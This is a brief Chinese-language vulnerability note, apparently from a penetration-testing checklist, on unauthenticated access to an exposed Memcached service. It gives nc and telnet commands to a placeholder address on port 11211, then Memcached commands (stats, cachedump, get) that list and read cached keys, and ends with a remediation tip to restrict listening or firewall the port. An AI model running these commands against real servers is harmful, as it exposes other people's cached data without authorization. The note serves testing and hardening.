memcached未授权
漏洞成因:
Memcached端口是对外开放的,用nc或Telne可以直接登录,查看信息,增加修改都可以。
nc -vv 1.2.3.4 11211
telnet 1.2.3.4 11211
验证读取key:
stats
stats items
stats cachedump 22 0
get kkkkkkkkkkkk
修复建议:
memcached设置监听内网或配置防火墙限制非必要的远程访问
